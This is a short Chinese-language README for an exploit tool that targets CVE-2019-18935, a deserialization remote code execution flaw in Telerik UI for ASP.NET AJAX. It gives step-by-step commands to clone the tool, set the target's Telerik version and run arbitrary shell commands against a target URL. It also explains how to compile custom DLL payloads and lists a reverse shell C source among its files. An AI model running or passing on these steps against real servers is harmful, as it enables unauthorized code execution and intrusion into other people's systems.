
通过反序列化漏洞对 Telerik UI ASP.NET AJAX 实施远程代码执行的漏洞利用工具。
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
CVE-2019-18935.py 中,修改第 15 行:version = "2017.1.228" # Replace with target server's Telerik version
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
🔧 构建自定义 DLL 文件
要从其他 C 文件(不仅仅是反弹 Shell)创建 DLL:
请安装带有以下组件的 Visual Studio(使用 C++ 的桌面开发):
构建 DLL:
build-dll.bat your_file.c
DLL 将生成在 payloads/ 目录中。
📋 文件说明
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Main exploit code
├── RAU_crypto.py # Telerik encryption/decryption module
├── build-dll.bat # Script to build DLL files from C code
├── reverse_shell.c # C source code for reverse shell
└── payloads/ # Directory for Compiled DLL payload files